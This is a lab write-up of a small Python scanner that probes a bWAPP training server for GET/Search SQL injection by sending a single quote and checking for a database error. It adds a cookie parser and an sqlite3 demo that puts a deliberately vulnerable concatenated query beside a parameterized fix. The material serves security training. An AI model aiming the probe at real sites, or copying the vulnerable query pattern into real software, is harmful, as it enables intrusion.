Python3 / bWAPP project: a Python3 script implementation for A1 Injection (SQL injection, GET/Search) from the 2017 OWASP Top 10
1. Project background
Server, bWAPP platform:
The bWAPP security test system is deployed on the 192.168.40.248 machine:
http://192.168.40.248/bWAPP/sqli_1.php
It can be reached successfully and used for security testing.
Client: Kali Linux 192.168.40.181
Python 3.6 is installed, with the following libraries:
ssl bs4 json redis urllib pexpect termcolor hashlib telnetlib pymysql pymongo
All project files are created on the client (all files have permission 755):
touch xxx.py
chmod 755 -R xxx.py
touch xxx.txt
chmod 755 -R xxx.txt
mkdir xxxx
2. Project description
2.1. All files involved in the project: root directory
root@kali:~/bwapp# tree /root/bwapp
/root/bwapp
├── bWAPP.py
├── cookies.txt
├── injection
│ ├── __init__.py
│ ├── injectionmain.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ └── injectionmain.cpython-36.pyc
│ └── SQL_injection
│ ├── __init__.py
│ ├── __pycache__
│ │ ├── __init__.cpython-36.pyc
│ │ └── SQL_injection_get_search.cpython-36.pyc
│ └── SQL_injection_get_search.py
├── pocdb.py
└── __pycache__
└── pocdb.cpython-36.pyc
5 directories, 12 files
root@kali:~/bwapp#
File descriptions:
Root directory:
bWAPP.py is the main script.
cookies.txt stores the cookies from the most recent login.
injection is a directory for the injection class of the OWASP Top 10; it holds the individual injection vulnerabilities.
pocdb.py enumerates every vulnerability type in the OWASP Top 10; under each type, every concrete sub-vulnerability maps to its own user-defined class in a dictionary.
__pycache__ is an empty directory that only caches temporary data.
bWAPP.py script code
root@kali:~/bwapp# cat bWAPP.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
Author: xuweibo
description: bWAPP main
date: created 2018-05-16
'''
import os
import sys
import io
import re
import time
import requests
import warnings
import termcolor
from termcolor import cprint
from urllib.parse import urlparse
from injection.injectionmain import *
from pocdb import pocdb_pocs
from multiprocessing import Pool
from multiprocessing.dummy import Pool as ThreadPool

warnings.filterwarnings("ignore")
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
SEARCH_HISTORY = dict()
# Version No. is :
VERSION = 'v1.0'
FLAGLET = '''
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
'''
threads_num = 10
# parallel task pool
injectionpool = ThreadPool(threads_num)


def injectionprint(injectionname):
    msg = ">>>Testing injection vulns...."
    sys.stdout.write(msg + injectionname + " " * (len(msg) + 10) + "\n")
    sys.stdout.flush()
    time.sleep(0.5)


def injectioncheck(injectionpoc):
    injectionpoc.run()


def injectionpoc_check(injectionurl):
    poc_class = pocdb_pocs(injectionurl)
    poc_dict = poc_class.injectionpocdict
    cprint(">>>Injection漏洞测试URL:" + injectionurl + "\t可用POC个数[" + str(len(poc_dict)) + "]", "magenta")
    injectionpool.map(injectionprint, poc_dict.keys())
    print("\n")
    results = injectionpool.map(injectioncheck, poc_dict.values())
    injectionpool.close()
    injectionpool.join()


def bWAPPMain(checkurl):
    try:
        # run the injection POC checks against the URL
        injectionpoc_check(checkurl)
    except Exception as e:
        print(e)
        cprint(">>>>>>>>>>>>>>>>>>超时", "cyan")


if __name__ == '__main__':
    usage = FLAGLET + '''
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
''' + '\nVersion is : ' + VERSION
    if len(sys.argv) < 2 or sys.argv[1] == "-h":
        cprint(usage, "blue")
    elif sys.argv[1] == "-l":
        # list the names of the injection POCs
        pocclass = pocdb_pocs("")
        injectionclass = pocclass.injectionpocdict
        print("\t\t\tInjection POC")
        for injection in injectionclass:
            print("|" + injection + " ")
        print("|-------------------------------------------------|")
        print("\r")
    elif sys.argv[1] == "-u" and len(sys.argv) > 2:  # "-u" without a URL must not raise IndexError
        bWAPPMain(sys.argv[2])
    else:
        bWAPPMain(sys.argv[1])
root@kali:~/bwapp#
cookies.txt text content
root@kali:~/bwapp# cat cookies.txt
PHPSESSID=4c0d4229f5d980eae7cb9a5551957209; security_level=0
root@kali:~/bwapp#
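The POC in SQL_injection_get_search.py reads this file by splitting on ";" and then on the first "=", which raises ValueError as soon as the file ends with a ";" or a blank line. As an added example, not part of this project, here is a tolerant parser for the same format that skips empty or malformed fragments, keeps any "=" inside a value, and also reports whether the file is readable by other local users (the session id it holds is a credential). The sample cookie text and the session id in it are constructed.

```python
import os
import stat
from typing import Dict


def parse_cookie_file_text(text: str) -> Dict[str, str]:
    """Parse 'name=value; name=value' text into the dict shape requests.get(cookies=...) takes.
    Blank fragments (a trailing ';' or newline) and fragments without '=' are skipped
    instead of raising; only the first '=' separates the name from the value."""
    cookies: Dict[str, str] = {}
    for fragment in text.split(";"):
        fragment = fragment.strip()
        if not fragment or "=" not in fragment:
            continue
        name, value = fragment.split("=", 1)
        name = name.strip()
        if name:
            cookies[name] = value.strip()
    return cookies


def load_cookies(path: str) -> Dict[str, str]:
    """Read a cookie file in the project's format; the path is the caller's choice."""
    with open(path, "r", encoding="utf-8") as fh:
        return parse_cookie_file_text(fh.read())


def cookie_file_is_private(path: str) -> bool:
    """True only when group and other hold no permission bits on the file.
    With the chmod 755 used when the project files were created, this returns
    False: the session id is readable by every local user, and 600 is the
    appropriate mode for a file that stores a credential."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return mode & 0o077 == 0


# Constructed sample in the shape of cookies.txt above; the PHPSESSID value is made up.
SAMPLE_COOKIE_TEXT = "PHPSESSID=0123456789abcdef0123456789abcdef; security_level=0;\n"

if __name__ == "__main__":
    print(parse_cookie_file_text(SAMPLE_COOKIE_TEXT))
```

The trailing ";" and newline in the sample are exactly the input on which the project's own loop would fail with "not enough values to unpack"; here they are simply ignored.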
pocdb.py script code
root@kali:~/bwapp# ls
bWAPP.py cookies.txt injection pocdb.py __pycache__
root@kali:~/bwapp# cat pocdb.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
name: POC dictionary
author: xuweibo
description: entry point of main's API
'''
from injection.injectionmain import *


# Enumerates every vulnerability type in the OWASP Top 10; under each type, every concrete
# sub-vulnerability name (as shown on the test page) maps to an instance of its own class.
class pocdb_pocs:
    def __init__(self, url):
        self.url = url
        self.injectionpocdict = {
            "SQL injection(GET/Search)": SQL_injection_get_search_BaseVerify(url)
        }
root@kali:~/bwapp#
2.2. All files involved in the project: injection directory
root@kali:~/bwapp# cd injection/
root@kali:~/bwapp/injection# tree /root/bwapp/injection/
/root/bwapp/injection/
├── __init__.py
├── injectionmain.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── injectionmain.cpython-36.pyc
└── SQL_injection
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py
3 directories, 8 files
root@kali:~/bwapp/injection#
root@kali:~/bwapp/injection# ls
__init__.py injectionmain.py __pycache__ SQL_injection
root@kali:~/bwapp/injection#
File descriptions:
injection directory:
__init__.py is an empty script file.
injectionmain.py imports, for each concrete injection vulnerability under the injection class, the class that checks it.
__pycache__ is an empty directory that caches temporary data.
SQL_injection is the SQL injection directory.
injectionmain.py script content
root@kali:~/bwapp/injection# ls
__init__.py injectionmain.py __pycache__ SQL_injection
root@kali:~/bwapp/injection# cat injectionmain.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
# Import the POC class defined in injection/SQL_injection/SQL_injection_get_search.py
from injection.SQL_injection.SQL_injection_get_search import SQL_injection_get_search_BaseVerify
root@kali:~/bwapp/injection#
2.3. All files involved in the project: SQL_injection directory
root@kali:~/bwapp/injection# cd SQL_injection/
root@kali:~/bwapp/injection/SQL_injection# tree /root/bwapp/injection/SQL_injection/
/root/bwapp/injection/SQL_injection/
├── __init__.py
├── __pycache__
│ ├── __init__.cpython-36.pyc
│ └── SQL_injection_get_search.cpython-36.pyc
└── SQL_injection_get_search.py
1 directory, 4 files
root@kali:~/bwapp/injection/SQL_injection#
File descriptions:
SQL_injection directory:
__init__.py is an empty script file.
__pycache__ is an empty directory that caches temporary data.
SQL_injection_get_search.py holds the POC code for the GET/Search vulnerability in the SQL injection class.
SQL_injection_get_search.py script code
root@kali:~/bwapp/injection/SQL_injection# cat SQL_injection_get_search.py
#!/usr/bin/python3.6
# --*-- coding:utf-8 --*--
'''
name: injection / SQL_injection / SQL_injection_get_search.php (GET/SEARCH) SQL injection
author: xuweibo
description: the file SQL_injection_get_search.php has a GET/Search SQL injection
'''
import sys
import requests
import warnings
from termcolor import cprint


class SQL_injection_get_search_BaseVerify:
    def __init__(self, url):
        self.url = url

    def run(self):
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
        payload = "?title=1%27&action=search"
        vulnurl = self.url + payload
        cookies = {}
        # reference: https://www.v2ex.com/t/97347
        f = open("/root/bwapp/cookies.txt", "r")  # read the cookies saved under the project root
        for line in f.read().split(";"):
            name, value = line.strip().split("=", 1)
            cookies[name] = value
        f.close()
        try:
            # headers is now actually sent; a timeout is set so the "timeout" message below is accurate
            req = requests.get(vulnurl, headers=headers, cookies=cookies, timeout=10)
            # req.text holds the response body
            if r"You have an error in your SQL syntax" in req.text:
                cprint("[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)\nplyload: " + vulnurl, "red")
        except requests.RequestException:
            cprint("[-] " + __file__ + "===================>连接超时", "cyan")


if __name__ == "__main__":
    warnings.filterwarnings("ignore")
    testVuln = SQL_injection_get_search_BaseVerify(sys.argv[1])
    testVuln.run()
root@kali:~/bwapp/injection/SQL_injection#
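The POC above decides on a single signal: whether a title of 1' makes the page echo a database syntax error. The following added example, which is not part of the bWAPP project or of the author's scripts, reproduces the server side of that signal in Python: a search built by string concatenation (the pattern that a "You have an error in your SQL syntax" response implies) next to the same search with a bound parameter, which is the fix. It uses Python's built-in sqlite3 in memory rather than bWAPP's MySQL, so the error text is SQLite's and not the MySQL string the POC looks for; the movie table and its rows are constructed.

```python
import sqlite3
from typing import Callable, Dict, List


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for a movie table (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE movies (id INTEGER PRIMARY KEY, title TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO movies (title) VALUES (?)",
        [("Iron Man",), ("The Matrix",), ("Iron Giant",)],
    )
    conn.commit()
    return conn


def search_vulnerable(conn: sqlite3.Connection, title: str) -> List[str]:
    """Concatenates the user-supplied title into the SQL text.  A single quote
    in the input closes the string literal early and the remainder is parsed
    as SQL, which is what surfaces the syntax error the POC detects."""
    sql = "SELECT title FROM movies WHERE title LIKE '%" + title + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, title: str) -> List[str]:
    """Binds the title as a parameter: the driver passes it as data, so a quote
    is just a character to match and can never change the statement."""
    sql = "SELECT title FROM movies WHERE title LIKE ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + title + "%",))]


def probe(search_fn: Callable[[sqlite3.Connection, str], List[str]],
          conn: sqlite3.Connection, title: str) -> Dict[str, object]:
    """Same decision the POC makes from the HTTP response: did this input
    trigger a database syntax error, or did the query run normally?"""
    try:
        return {"error": None, "rows": search_fn(conn, title)}
    except sqlite3.OperationalError as exc:
        return {"error": str(exc), "rows": None}


if __name__ == "__main__":
    db = make_db()
    print("normal search        :", probe(search_vulnerable, db, "Iron"))
    print("probe 1' (vulnerable):", probe(search_vulnerable, db, "1'"))
    print("probe 1' (safe)      :", probe(search_safe, db, "1'"))
```

Both functions return the same rows for an ordinary search term; only the concatenated version turns the quote into an error. On the defensive side the same split applies to detection: an application that returns the raw driver error to the client is what makes this one-request check work, so generic error pages plus server-side logging of database exceptions remove the signal without hiding the fault from operators.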
3. Actual run
root@kali:~/bwapp/injection/SQL_injection# cd ..
root@kali:~/bwapp/injection# cd ..
root@kali:~/bwapp# clear
root@kali:~/bwapp# python3.6 bWAPP.py -u http://192.168.40.248/bWAPP/sqli_1.php
>>>Injection漏洞测试URL:http://192.168.40.248/bWAPP/sqli_1.php 可用POC个数[1]
>>>Testing injection vulns....SQL injection(GET/Search)
[+]该页面SQL_injection_get_search.php 存在SQL注入漏洞...(高危)
plyload: http://192.168.40.248/bWAPP/sqli_1.php?title=1%27&action=search
root@kali:~/bwapp#
root@kali:~/bwapp# python3.6 bWAPP.py
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
Version is : v1.0
root@kali:~/bwapp#
root@kali:~/bwapp# python3.6 bWAPP.py -h
\-\ /-/ /-/ /-/-\ |-|-----------| |-|-------------|
|-| \ \ / / \ / / / / \ \ | |---------| | | |-----------| |
| | \ \ / / \ \ / / / / \ \ | | | | | | | |
| |_________\ \ / / \ \ / / / / \ \ | |_________| | | |___________| |
|_________ |\ \ / / \ \ / / / /_______\ \ | |___________| | |_____________|
| | | \ \ / / \ \ / / / __________ \ | | | |
|_________| | \ \ / \ \/ / / / \ \ | | | |
|___________| \_/ \_\/ /-/ \ \|-| |-|
使用bWAPP平台进行2017年的OWASP TOP 10 WEB安全漏洞演练
opt:
------------------------------------------------------------------------
-h Get help
-u Url
-l List avalible pocs
------------------------------------------------------------------------
Usage:
1.python3.6 bWAPP.py -u http://www.example.com 对URL执行所有POC检测(暴力)
2.python3.6 bWAPP.py -l 列出所有的POC
Version is : v1.0
root@kali:~/bwapp# python3.6 bWAPP.py -l
Injection POC
|SQL injection(GET/Search)
|-------------------------------------------------|